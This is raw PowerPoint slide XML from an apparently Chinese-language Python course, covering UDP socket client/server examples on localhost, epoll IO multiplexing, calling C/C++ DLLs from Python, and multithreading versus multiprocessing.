            <a:endParaRPr lang="en-US" altLang="zh-CN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socket.SOCK_STREAM　流式socket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（默认）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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socket.SOCK_DGRAM　数据报式socket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zh-CN" altLang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="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0（默认）与特定的地址家族相关的协议,如果是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则系统就会根据地址格式和套接类别,自动选择一个合适的协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="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95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网络编程模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-UDP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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67001" y="693420"/>
            <a:ext cx="421897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端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FF7800"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Monac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b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7800"/>
              </a:solidFill>
              <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Monaco"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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socket.socket(socket.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="105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AF_INET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socket.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="105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SOCK_DGRAM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s.bind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127.0.0.1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绑定端口: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Bind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9999...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True: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接收数据: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data,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s.recvfrom(1024)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Received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%s:%s.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addr)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s.sendto(b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Hello,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%s!</a:t>
            </a:r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data,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addr)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onaco"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.close()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13965" y="2849567"/>
            <a:ext cx="4212077" cy="165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端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kumimoji="0" lang="en-US" altLang="zh-CN" sz="900" b="1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2"/>
              <a:ea typeface="Monaco"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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socket.socket(socket.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="105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AF_INET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socket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zh-CN" sz="105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SOCK_DGRAM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sz="105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Michael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Tracy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Sarah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发送数据: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s.sendto(data,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127.0.0.1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zh-CN" sz="1050" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9999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接收数据:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1050" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="9999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print(s.recv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zh-CN" sz="105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decode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US" altLang="zh-CN" sz="105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zh-CN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zh-CN" altLang="en-US" sz="105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sz="105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zh-CN" altLang="zh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s.close()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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zh-CN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b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7800"/>
              </a:solidFill>
              <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Monaco"/>
            </a:endParaRP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2" name="Picture 6" descr="client-server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r="1359" b="2738"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4559924" y="843558"/>
            <a:ext cx="433255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2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96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3345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en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>IO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>多路复用之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>epoll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/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6385"/>
            <a:ext cx="65" cy="42442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3002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0438" y="667344"/>
            <a:ext cx="8602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被公认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>Linux2.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>下性能最好的多路复用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>I/O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>就绪通知方法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/>
              <a:t>相比于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>select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epoll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>最大的好处在于它不会随着监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>数目的增长而降低效率。因为在内核中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>实现中，它是采用轮询来处理的，轮询的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>数目越多，耗时越多。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t="18608" r="5515" b="14749"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4211960" y="1275606"/>
            <a:ext cx="4104456" cy="1691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6160" y="1266202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import select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导入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= </a:t>
            </a:r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select.epoll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创建一个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epoll.register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文件句柄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事件类型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注册要监控的文件句柄和事件</a:t>
            </a:r>
            <a:b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事件类型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select.EPOLLIN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可读事件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select.EPOLLOUT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可写事件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select.EPOLLERR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错误事件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select.EPOLLHUP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客户端断开事件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epoll.unregister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文件句柄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销毁文件句柄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epoll.poll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(timeout)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当文件句柄发生变化，则会以列表的形式主动报告给用户进程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,timeout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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为超时时间，默认为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-1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，即一直等待直到文件句柄发生变化，如果指定为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那么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秒汇报一次当前文件句柄的变化情况，如果无变化则返回空</a:t>
            </a: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epoll.fileno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的控制文件描述符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(Return the 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control file descriptor)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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epoll.modfiy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fineno,event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fineno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为文件描述符 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event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为事件类型 作用是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="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修改文件描述符所对应的事件</a:t>
            </a:r>
            <a:b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epoll.fromfd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fileno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个指定的文件描述符创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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b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900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="black Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1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epoll.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty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关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9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epoll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="9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对象的控制文件描述符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="black 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415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97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/>
              <a:t>Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>编译的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>dll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6" y="2529458"/>
            <a:ext cx="3911788" cy="2198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21" y="1419622"/>
            <a:ext cx="4745072" cy="30243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492" y="600076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Python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虽开发效率很高，但作为脚本语言，其性能不高，所以为了兼顾开发效率和性能，通常把性能要求高的模块用</a:t>
            </a:r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或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c++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来实现或者在</a:t>
            </a:r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或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c++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中运行</a:t>
            </a:r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python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脚本来处理逻辑，前者通常是</a:t>
            </a:r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python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中一些模块的实现方式，后者服务端程序（实现业务扩展或是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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功能）和游戏开发（脚本只处理逻辑）中比较常见。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27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98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913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调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>c++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编译的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dll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8" y="576381"/>
            <a:ext cx="3782190" cy="41526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83718"/>
            <a:ext cx="4155178" cy="2300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5008" y="564475"/>
            <a:ext cx="4200162" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31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C++(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类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动态链接库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，需要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"C"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来辅助，也就是说还是只能调用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函数，不能直接调用方法，但是能解析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方法。不是用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"C"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，构建后的动态链接库没有这些函数的符号表。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6538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CuadroTexto"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667191" y="4823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4AEDA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>99</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="04AEDA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523875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290438" y="160819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多线程和多进程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3973" b="5502"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="602745"/>
            <a:ext cx="3226718" cy="2880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5" y="602745"/>
            <a:ext cx="5006107" cy="20838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31" y="2751770"/>
            <a:ext cx="3228975" cy="2762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65" y="2727377"/>
            <a:ext cx="5006107" cy="2004177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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5364062" y="3219822"/>
            <a:ext cx="2880320" cy="842083"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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全部打满</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断核心数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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5364062" y="1148544"/>
            <a:ext cx="2880320" cy="8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CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无法充分利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GIL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>全局锁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3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79754</TotalTime>
  <Words>12514</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(16:9)</PresentationFormat>
  <Paragraphs>2322</Paragraphs>
  <Slides>119</Slides>
  <Notes>116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52" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Bitstream Vera Sans Mono</vt:lpstr>
      <vt:lpstr>black Verdana</vt:lpstr>
      <vt:lpstr>FZLTXIHJW--GB1-0</vt:lpstr>
      <vt:lpstr>Gungsuh</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Microsoft Yahei</vt:lpstr>
      <vt:lpstr>Microsoft Yahei</vt:lpstr>
      <vt:lpstr>Monaco</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>华康娃娃体W5</vt:lpstr>
      <vt:lpstr>华康娃娃体W5(P)</vt:lpstr>
      <vt:lpstr>华文隶书</vt:lpstr>
      <vt:lpstr>华文宋体</vt:lpstr>
      <vt:lpstr>华文新魏</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>楷体_GB2312</vt:lpstr>
      <vt:lpstr>隶书</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2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Matpliot其它效果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iamisis</dc:creator>
  <cp:lastModifiedBy>flowingheart</cp:lastModifiedBy>
  <cp:revision>1432</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-04-11T02:39:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-06T11:20:03Z</dcterms:modified>
</cp:coreProperties>
</file>